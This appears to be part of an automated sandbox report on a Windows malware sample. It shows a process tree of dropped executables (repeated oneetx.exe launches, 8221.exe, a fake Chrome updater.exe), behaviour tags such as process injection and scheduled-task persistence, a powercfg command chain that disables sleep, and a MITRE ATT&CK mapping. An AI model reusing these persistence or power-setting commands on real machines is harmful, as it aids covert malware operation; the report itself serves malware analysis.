  2⤵
  - Creates scheduled task(s)
  PID:2184

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:5700
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6064
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1632
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5900
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:6132
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1788 -ip 1788
1⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5940 -ip 5940
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5268

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:1684

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:2348

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5968

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:4352

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:1092

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:4592

C:\Users\Admin\AppData\Roaming\vhidrbj
C:\Users\Admin\AppData\Roaming\vhidrbj
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5784

C:\Users\Admin\AppData\Roaming\cdidrbj
C:\Users\Admin\AppData\Roaming\cdidrbj
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4808

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:428

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5820 -ip 5820
1⤵
PID:3180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1988 -ip 1988
1⤵
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1536 -ip 1536
1⤵
PID:2924

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5496

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:3364

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5800

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5788

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 452 -p 2328 -ip 2328
1⤵
PID:5340

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 544 -p 64 -ip 64
1⤵
PID:5504

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 64 -s 3552
1⤵
- Program crash
PID:5584

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3068

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:1504

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:3568

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5660

C:\Users\Admin\AppData\Roaming\vhidrbj
C:\Users\Admin\AppData\Roaming\vhidrbj
1⤵
- Executes dropped EXE
PID:3816
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 308
  2⤵
  - Program crash
  PID:5368

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:3908

C:\Users\Admin\AppData\Roaming\cdidrbj
C:\Users\Admin\AppData\Roaming\cdidrbj
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3816 -ip 3816
1⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:4428

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:4584

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5796

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:4832

C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe
C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe --Task
1⤵
- Suspicious use of SetThreadContext
PID:6020
- C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe
  C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe --Task
  2⤵
  PID:2248

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:4736

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:5040

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:5528

C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe
C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe --Task
1⤵
- Suspicious use of SetThreadContext
PID:5160
- C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe
  C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe --Task
  2⤵
  PID:5940

C:\Users\Admin\AppData\Roaming\vhidrbj
C:\Users\Admin\AppData\Roaming\vhidrbj
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5800

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:1308

C:\Users\Admin\AppData\Roaming\cdidrbj
C:\Users\Admin\AppData\Roaming\cdidrbj
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1628

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:4876

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:4964

C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe
C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe --Task
1⤵
- Suspicious use of SetThreadContext
PID:5052
- C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe
  C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713\8221.exe --Task
  2⤵
  PID:4632

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:4268

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:872

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:5432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery